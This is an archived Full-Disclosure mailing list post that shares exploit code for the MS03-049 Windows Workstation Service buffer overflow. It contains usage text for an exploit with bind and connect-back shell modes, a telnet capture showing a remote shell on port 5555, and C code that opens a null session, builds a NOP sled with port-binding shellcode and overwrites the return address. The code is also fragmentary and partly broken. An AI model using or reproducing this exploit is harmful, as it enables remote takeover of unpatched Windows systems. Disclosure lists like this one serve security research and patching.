lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
From: elvi52001 at (- ElviS -)
Subject: Windows Workstation Service Exploit MS03-049 - New?

a better code was made by snooq with good options :-)

 printf("Usage: %s [options]\n",s);
 printf("\t-r\tSize of 'return addresses'\n");
 printf("\t-a\tAlignment size [0~3]\n");
 printf("\t-p\tPort to bind shell to (in 'connecting' mode), or\n");
 printf("\t\tPort for shell to connect back (in 'listening' mode)\n");
 printf("\t-s\tShellcode offset from the return address\n");
 printf("\t-h\tTarget's IP\n");
 printf("\t-t\tTarget types. ( -H for more info )\n");
 printf("\t-H\tShow list of possible targets\n");
 printf("\t-l\tListening for shell connecting\n");
 printf("\t\tback to port specified by '-p' switch\n");
 printf("\t-i\tIP for shell to connect back\n");
 printf("\t-I\tTime interval between each trial ('connecting' mode only)\n");
 printf("\t-T\tTime out (in number of seconds)\n\n");
 printf("\tNotes:\n\t======\n\t'-h' is mandatory\n");

"Hanabishi Recca" <> wrote: 

C:\telnet 5555

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.



Proof of concept for MS03-049.
This code was tested on a Win2K SP4 with FAT32 file system, and is supposed
to work *only* with that (it will probably crash the the other 2Ks, no clue
about XPs).

To be compiled with lcc-win32 (*hint* link mpr.lib) ... I will not improve
this public version, do not bother to ask.

Credits go to eEye :)
See original bulletin for more information, it is very well documented.



#define SIZE 2048

// PEX generated port binding shellcode (5555)
unsigned char shellcode[] =
"\x66\x81\xec\x04\x07" // sub sp, 704h

unsigned char jmp[] =
"\xe9\x6f\xfd\xff\xff"; // jmp -290h to land in the payload

int main(void)
int ret;
HINSTANCE hInstance;
MYPROC procAddress;
char szBuffer[SIZE];
NETRESOURCE netResource;

netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName = "\\\\\\ipc$";

ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
if (ret != 0)
fprintf(stderr, "[-] WNetAddConnection2 failed\n");
return 1;

hInstance = LoadLibrary("netapi32");
if (hInstance == NULL)
fprintf(stderr, "[-] LoadLibrary failed\n");
return 1;

procAddress = (MYPROC)GetProcAddress(hInstance, "NetValidateName"); // up to you to check NetAddAlternateComputerName
if (procAddress == NULL)
fprintf(stderr, "[-] GetProcAddress failed\n");
return 1;

memset(szBuffer, 0x90, sizeof(szBuffer));
memcpy(&szBuffer[1400], shellcode, sizeof(shellcode) - 1);
// ebp @ &szBuffer[2013]
*(unsigned int *)(&szBuffer[2017]) = 0x74fdee63; // eip (jmp esp @ msafd.dll, use opcode search engine for more, but
// be aware that a call esp will change the offset in the stack)
memcpy(&szBuffer[2021 + 12], jmp, sizeof(jmp)); // includes terminal NULL char
ret = (procAddress)(L"\\\\", szBuffer, NULL, NULL, 0);

WNetCancelConnection2("\\\\\\ipc$", 0, TRUE);

return 0;

Do you Yahoo!?
Protect your identity with Yahoo! Mail AddressGuard
-------------- next part --------------
An HTML attachment was scrubbed...

Powered by blists - more mailing lists